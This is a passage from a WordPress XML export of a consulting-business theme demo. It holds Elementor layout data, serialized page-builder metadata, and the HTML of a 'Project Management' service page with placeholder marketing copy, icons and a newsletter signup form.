wealth."},"elements":[],"widgetType":"iiconbox2"}],"isInner":true},{"id":"e34cba3","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin":{"unit":"px","top":"0","right":"50","bottom":"0","left":"0","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"8022263","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/holidays.svg","id":643},"library":"svg"},"title":"Financial Services","des":"We help financial institutions, from banking and insurance to wealth.","icon_size":{"unit":"px","size":46,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"},{"id":"8ba35e7","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/energy.svg","id":980},"library":"svg"},"title":"Natural Resources","des":"We help financial institutions, from banking and insurance to wealth."},"elements":[],"widgetType":"iiconbox2"}],"isInner":true}],"isInner":true},{"id":"ce7cc23","elType":"section","settings":{"layout":"full_width","structure":"20","background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-service-detail3.jpg","id":982},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"padding":{"unit":"px","top":"70","right":"0","bottom":"70","left":"100","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"30","isLinked":false}},"elements":[{"id":"e61a616","elType":"column","settings":{"_column_size":50,"_inline_size":45.695999999999997953636921010911464691162109375,"_inline_size_tablet":80},"elements":[{"id":"4c16558","elType":"widget","settings":{"title":"how we help","header_size":"h6","title_color":"#FFFFFF","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":14,"sizes":[]},"typography_font_weight":"bold","typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"65dee06","elType":"widget","settings":{"title":"Align Costs with Strategy & Focus on Growth","header_size":"h3","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"heading"},{"id":"7ab0f67","elType":"widget","settings":{"btn_style":"light","text":"get in touch","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz-business\/blog\/","is_external":"","nofollow":"","custom_attributes":""},"button_text_color":"#FFFFFF"},"elements":[],"widgetType":"ibutton"}],"isInner":true},{"id":"abd3090","elType":"column","settings":{"_column_size":50,"_inline_size":54.304000000000002046363078989088535308837890625},"elements":[],"isInner":true}],"isInner":true},{"id":"29089d9","elType":"section","settings":{"layout":"full_width","gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"65","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"e0d31db","elType":"column","settings":{"_column_size":50,"_inline_size":46,"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"c0c4b49","elType":"widget","settings":{"title":"How It Works & How We Do It","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false},"typography_typography":"custom"},"elements":[],"widgetType":"heading"},{"id":"1507a17","elType":"widget","settings":{"editor":"<p>We are working in the format of an outsourcing project office. We assume operational coordination and control over the compliance with all project implementation parameters that ensures the execution of works on time.<\/p><p>Integrating of innovation and public benefit into your workflows; ensuring strategic and sustainable development of your organization from project.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"6bfd814","elType":"column","settings":{"_column_size":50,"_inline_size":54},"elements":[{"id":"ad31a08","elType":"widget","settings":{"title":"marketing analysis","percent":{"unit":"%","size":60,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"18","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false},"lbar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"},{"id":"2ef81ea","elType":"widget","settings":{"title":"finance strategy","percent":{"unit":"%","size":80,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"18","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false},"lbar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"},{"id":"d8149bc","elType":"widget","settings":{"title":"business innovation","percent":{"unit":"%","size":58,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"18","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false},"lbar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"},{"id":"97cbbb6","elType":"widget","settings":{"title":"CORPORATE MANAGEMENT","_padding":{"unit":"px","top":"0","right":"0","bottom":"18","left":"0","isLinked":false},"lbar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"206ff31","elType":"section","settings":{"gap":"extended","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"10","right":"10","bottom":"10","left":"10","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"50","left":0,"isLinked":false},"padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"187c777","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"15a4ea5","elType":"widget","settings":{"editor":"<blockquote>\u201cI cannot give you the formula for success, but I can give you the \nformula for failure. It is: Try to please everybody.\u201d\n<cite>david oswald<\/cite><\/blockquote>","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding":{"unit":"px","top":"0","right":"90","bottom":"0","left":"90","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"15","bottom":"0","left":"15","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"ec27098","elType":"widget","settings":{"title":"Business Planning & Strategy","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"8eca34c","elType":"widget","settings":{"ot_accs":[{"acc_title":"In what areas do you provide management consulting?","acc_content":"<p>Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.<\/p>","_id":"75ae542"},{"acc_title":"In which countries do you provide consulting services?","acc_content":"<p>Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.<\/p>","_id":"a85daa6"},{"acc_title":"How is a consulting project started and organized?","acc_content":"<p>Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.<\/p>","_id":"8e79519"}]},"elements":[],"widgetType":"iaccordions"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:11:{s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:5;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:19:"section_title_style";a:7:{s:21:"typography_typography";i:4;s:27:"typography_font_size_mobile";i:2;s:11:"title_color";i:2;s:22:"typography_font_family";i:1;s:20:"typography_font_size";i:1;s:22:"typography_font_weight";i:1;s:25:"typography_text_transform";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:4;s:3:"gap";i:4;s:6:"weight";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:12:"_css_classes";i:2;s:7:"_margin";i:2;}}}}s:6:"column";a:3:{s:5:"count";i:13;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:13;s:19:"_inline_size_mobile";i:4;s:19:"_inline_size_tablet";i:3;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:3:{s:13:"margin_tablet";i:3;s:6:"margin";i:2;s:13:"margin_mobile";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:6:"layout";i:5;s:3:"gap";i:6;s:16:"content_position";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:6;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:4:{s:7:"padding";i:5;s:14:"padding_mobile";i:4;s:6:"margin";i:2;s:13:"margin_mobile";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:6:{s:21:"background_background";i:2;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:2;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:8:{s:10:"text_color";i:1;s:16:"text_color_hover";i:1;s:11:"text_indent";i:1;s:26:"icon_typography_typography";i:1;s:27:"icon_typography_font_family";i:1;s:25:"icon_typography_font_size";i:1;s:27:"icon_typography_font_weight";i:1;s:30:"icon_typography_text_transform";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_image";a:5:{s:5:"image";i:1;s:10:"image_size";i:1;s:5:"align";i:1;s:7:"link_to";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:8:"_padding";i:2;s:15:"_padding_mobile";i:2;s:7:"_margin";i:1;}}}}s:9:"iiconbox2";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"icon_font";i:4;s:5:"title";i:4;s:3:"des";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:9:"icon_size";i:1;}}}}s:7:"ibutton";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"button_section";a:3:{s:9:"btn_style";i:1;s:4:"text";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:1:{s:17:"button_text_color";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:5:"title";i:4;s:7:"percent";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:4;s:15:"_padding_tablet";i:3;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:10:"lbar_color";i:4;}}}}s:11:"iaccordions";a:3:{s:5:"count";i:1;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:7:"ot_accs";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Project Management</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-services/project-management/</link>
		<pubDate>Tue, 22 Sep 2020 02:52:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=996</guid>
		<description></description>
		<content:encoded><![CDATA[<img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box4.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box4.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box4-1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box4-1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" />											
			<h3>We Conduct Marketing Research</h3>		
		<p>It’s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique "Today Forward, Future Back" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We’ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.</p><p>Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation
</h6>		
					90				
			<h6>finance strategy</h6>		
		<h3>We are Always Ready to Assist Our Clients</h3><p>developing financial processes and procedures</p>		
			<h5>How It Works & How We Do It</h5>		
		<p>Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.
									</li>
						</ul>
		<blockquote>“I cannot give you the formula for success, but I can give you the 
formula for failure. It is: Try to please everybody.”
<cite>david oswald</cite></blockquote>		
			<h5>Business Planning & Strategy</h5>		
										<img width="466" height="296" src="https://maxbizz.s3.amazonaws.com/images/chart1-service-home5.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart1-service-home5.png 466w, https://maxbizz.s3.amazonaws.com/images/chart1-service-home5-300x191.png 300w" sizes="(max-width: 466px) 100vw, 466px" />											
		<p>Nurture promoters, your loyal customers who are more profitable and will advocate for your business—both in good times and bad.</p><p>Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements.</p>		
			<h6>Services</h6>		
					<ul>
							<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/marketing-research">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										marketing research
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										Organizational Audit
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/business-consulting">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										business consulting
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										project management
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										support functions
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										finance planning
											</a>
									</li>
						</ul>
			<h6>Contacts</h6>		
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>				
				<h6>
					Visit Us Daily
				</h6>
								<p>411 University St, Seattle</p>
				<a href="tel:+1-800-456-478-23">
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve">
<g>
	<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</svg>				</a>
				<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a>
				</h6>
								<p>+1-800-456-478-23</p>
				<a href="mailto:maxbizz@mail.com">
				<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>				</a>
				<h6>
					<a href="mailto:maxbizz@mail.com">Mail Us</a>
				</h6>
								<p>maxbizz@mail.com</p>
											<a href="#">
							<img width="270" height="90" src="https://maxbizz.s3.amazonaws.com/images/img-btn-pdf-home5.jpg" alt="" loading="lazy" />								</a>
			<h4>Ready to Get Started?</h4>		
<p role="status" aria-live="polite" aria-atomic="true"></p> <ul></ul>
<form action="/maxbizz-finance/wp-admin/admin-ajax.php#wpcf7-f741-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="741" />
<input type="hidden" name="_wpcf7_version" value="5.3" />
<input type="hidden" name="_wpcf7_locale" value="en_US" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f741-o1" />
<input type="hidden" name="_wpcf7_container_post" value="0" />
<input type="hidden" name="_wpcf7_posted_data_hash" value="" />
<input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *" /><br />
<input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *" /><br />
<button type="submit">Subscribe Now</button>
</form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>996</wp:post_id>
		<wp:post_date><![CDATA[2020-09-22 02:52:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-22 02:52:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-management]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[869]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
